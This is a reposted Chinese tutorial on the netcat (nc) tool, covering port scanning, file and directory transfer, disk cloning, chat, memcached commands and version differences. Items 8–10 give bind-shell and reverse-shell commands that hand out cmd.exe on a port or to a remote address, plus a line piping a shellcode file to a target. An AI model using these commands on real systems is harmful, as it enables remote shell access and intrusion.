轉載▼功能說明:強大的網絡工具
語 法:nc [-hlnruz][-g<<span style="color:#2a2a2a">網關...>][-G<</span>指向器數目>][-i<</span>延遲秒數>][-o<</span>輸出文件>][-p<</span>通信端口>][-s<</span>來源位址>][-v...][-w<</span>超時秒數>][主機名稱][通信端口...]
參 數:
linux nc (netcat)最新版源碼下載及nc命令詳解
http://netcat.sourceforge.net/
擴展資料一: nc簡單使用示例
簡單用法舉例
1.端口掃描
# nc -v -w 2 192.168.2.34 -z 21-24
nc: connect to 192.168.2.34 port 21 (tcp) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh]succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused
2.從192.168.2.33拷貝文件到192.168.2.34
在192.168.2.34上:nc -lp 1234 > test.txt
在192.168.2.33上:nc 192.168.2.34 1234
3.簡單聊天工具
在192.168.2.34上:nc -l 1234
在192.168.2.33上:nc 192.168.2.34 1234
這樣,雙方就可以相互交流了。使用ctrl+C(或D)退出。
4.用nc命令操作memcached
1)存儲數據:printf "setkey 0 10 6rnresultrn” |nc 192.168.2.34 11211
2)獲取數據:printf “get keyrn” |nc 192.168.2.34 11211
3)刪除數據:printf “delete keyrn” |nc 192.168.2.34 11211
4)查看狀態:printf "statsrn” |nc 192.168.2.34 11211
5)模擬top命令查看狀態:watch “echo stats” |nc 192.168.2.34 11211
6)清空緩存:printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作,清空了緩存就沒了)
nc -l 1234
nc 127.0.0.1 1234
在端口1234建立連接,互相發送輸入
nc -p 1234 -w 5 host.example.com 80
建立從本地1234端口到host.example.com的80端口連接,5秒超時
nc -u host.example.com 53
u爲UDP連接
echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80
連接到主機並執行
nc -v -z host.example.com 70-80
掃描端口(70到80),可指定範圍。-v輸出詳細信息。
5.連接到遠程主機
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80端口
6.監聽本地主機
格式:nc -l -p 80
講解:監聽本機的TCP80端口
7.掃描遠程主機
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有端口
8.REMOTE主機綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口
9.REMOTE主機綁定SHELL並反向連接,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口
以上爲最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令"|"與重定向命令"<"、">"等等命令功能更強大......)。
10.作***程序用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
講解:連接到192.168.x.x的80端口,並在其管道中發送'c:\exploit.txt'的內容(兩種格式確有相同的效果,真是有異曲同工之妙:P)
附:'c:\exploit.txt'爲shellcode等
11.作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用'-L'(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c爲止
12.作蜜罐用[2],例子:
格式:nc -L -p 80 > c:\log.txt
講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c爲止,同時把結果輸出到'c:\log.txt'中,如果把‘>'
改爲‘>>'即可以追加日誌
附:'c:\log.txt'爲日誌等
13.作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:\honeypot.txt
格式2:type.exe c:\honeypot.txt|nc -L -p 80
講解:使用'-L'可以不停地監聽某一個端口,直到ctrl+c爲止,並把'c:\honeypot.txt'的內容‘送'入其管道中!
14.備份檔案
A機的資料夾 /data備份到B主機的backup.tgz
源主機: tar czf - work|nc -l -c -p 1234
目的主機: nc 192.168.0.1 1234 >a.tgz
或
A:tar -zcf data|nc -l -p 4444
B:nc a 4444 >backup.tgz
傳完後ctrl+c中斷連接,這樣A主機不會生成檔案直接傳到了backup.tgz,缺點就是不知道啥時候傳完,嘿嘿
擴展資料二:命令linux nc命令傳輸文件
nc到底幹嘛用的我不多描述,今天主要講下用nc傳輸文件。由於公司的設備sudo後沒有ssh,scp等遠程接入命令,或host.deny裏面設置了ssh的deny,不管怎樣的原因。我今天跨過大家常用的scp,來說明下一個更有用的輕量級工具,nc的另一個強大的功---文件傳輸。
範例如下:
目的主機監聽
nc -l監聽端口
nc -l 4444 > cache.tar.gz
源主機發起請求
nc
nc
[root@localhost jiangbao]# netstat -tpln
tcp
DATA TRANSFER
Start by using nc to listen on a specific port, with output captured into a file:
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file whichis to be transferred:
$ nc host.example.com 1234
擴展資料三: linux nc (NetCat)命令詳解,這篇文章對nc的介紹非常詳細,和以上資料有部分重複.
一、版本
通常的Linux發行版中都帶有NetCat(簡稱nc),甚至在拯救模式光盤中也由busybox提供了簡版的nc工具。但不同的版本,其參數的使用略有差異。
NetCat官方地址:http://netcat.sourceforge.net/
引用
[root@hatest1 ~]# cat /etc/asianux-release
Asianux release 2.0 (Trinity SP2)
[root@hatest1 ~]# cat /etc/redflag-release
Red Flag DC Server release 5.0 (Trinity SP2)
[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22
建議在使用前,先用man nc看看幫助。這裏以紅旗DC Server 5.0上的1.10版本進行簡單說明。
假設兩服務器信息:
引用
server1: 192.168.228.221
server2: 192.168.228.222
二、常見使用
1、遠程拷貝文件
從server1拷貝文件到server2上。需要先在server2上,用nc激活監聽,server2上運行:
[root@hatest2 tmp]# nc -lp 1234 > install.log
server1上運行:
引用
[root@hatest1 ~]# ll install.log
-rw-r–r–
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log
2、克隆硬盤或分區
操作與上面的拷貝是雷同的,只需要由dd獲得硬盤或分區的數據,然後傳輸即可。
克隆硬盤或分區的操作,不應在已經mount的的系統上進行。所以,需要使用安裝光盤引導後,進入拯救模式(或使用Knoppix工具光盤)啓動系統後,在server2上進行類似的監聽動作:
# nc -l -p 1234 | dd of=/dev/sda
server1上執行傳輸,即可完成從server1克隆sda硬盤到server2的任務:
# dd if=/dev/sda | nc 192.168.228.222 1234
※完成上述工作的前提,是需要落實光盤的拯救模式支持服務器上的網卡,並正確配置IP。
3、端口掃描
可以執行:
引用
# nc -v -w 1 192.168.228.222 -z 1-1000
hatest2 [192.168.228.222] 22 (ssh) open
4、保存Web頁面
# while true; do nc -l -p 80 -q 1 < somepage.html; done
5、模擬HTTP Headers
引用
[root@hatest1 ~]# ncwww.linuxso.com80
GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser
HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
在nc命令後,輸入紅色部分的內容,然後按兩次回車,即可從對方獲得HTTP Headers內容。
6、聊天
nc還可以作爲簡單的字符下聊天工具使用,同樣的,server2上需要啓動監聽:
[root@hatest2 tmp]# nc -lp 1234
server1上傳輸:
[root@hatest1 ~]# nc 192.168.228.222 1234
這樣,雙方就可以相互交流了。使用Ctrl+D正常退出。
7、傳輸目錄
從server1拷貝nginx-0.6.34目錄內容到server2上。需要先在server2上,用nc激活監聽,server2上運行:
引用
[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
server1上運行:
引用
[root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234
8、參數簡介
這僅是一個1.10版本的簡單說明,詳細的參數使用還是需要看man:
引用
想要連接到某處: nc [-options] hostname port[s] [ports] …
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h幫助信息
-i secs延時的間隔
-l監聽模式,用於入站連接
-n指定數字的IP地址,不能用hostname
-o file記錄16進制的傳輸
-p port本地端口號
-r任意指定本地及遠程端口
-s addr本地源地址
-u UDP模式
-v詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z將輸入輸出關掉——用於掃描時,其中端口號可以指定一個或者用lo-hi式的指定範圍。
三、版本差異
不用系統上提供的nc版本會有說不同,其提供的參數使用方法也略有差異。
例如,紅旗Asianux 3.0 SP1拯救光盤上的版本是供使用的參數僅有一部分:
引用
# nc -h
BusyBox v1.2.0 (2008.04.14-01:35+0000) multi-call binary
Usage: nc [OPTIONS] [IP] [port]
Netcat opens a pipe to IP:port
Options:
引用
[root@ftpserver ~]# rpm -q nc
nc-1.84-10
[root@ftpserver ~]# nc -lp 1234
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
講查看man文檔,可見在這個版本中,-l是不能與-s、-p、-z一起使用的,-w參數也會被忽略,所以,正確的用法是:
[root@ftpserver tmp]# nc -l 1234
四、用在腳本中
nc每次啓動監聽後,都會在客戶端連接完成並退出的同時,服務端一同退出。所以,如果需要不斷的使用nc進行數據傳輸,需要在腳本中使用循環。利用nc實現更多的功能,可參考其rpm提供的參考腳本:
引用
# rpm -qd nc
/usr/share/doc/nc-1.10/Changelog
/usr/share/doc/nc-1.10/README
/usr/share/doc/nc-1.10/scripts/README
/usr/share/doc/nc-1.10/scripts/alta
/usr/share/doc/nc-1.10/scripts/bsh
/usr/share/doc/nc-1.10/scripts/dist.sh
/usr/share/doc/nc-1.10/scripts/irc
/usr/share/doc/nc-1.10/scripts/iscan
/usr/share/doc/nc-1.10/scripts/ncp
/usr/share/doc/nc-1.10/scripts/probe
/usr/share/doc/nc-1.10/scripts/web
/usr/share/doc/nc-1.10/scripts/webproxy
/usr/share/doc/nc-1.10/scripts/webrelay
/usr/share/doc/nc-1.10/scripts/websearch
/usr/share/man/man1/nc.1.gz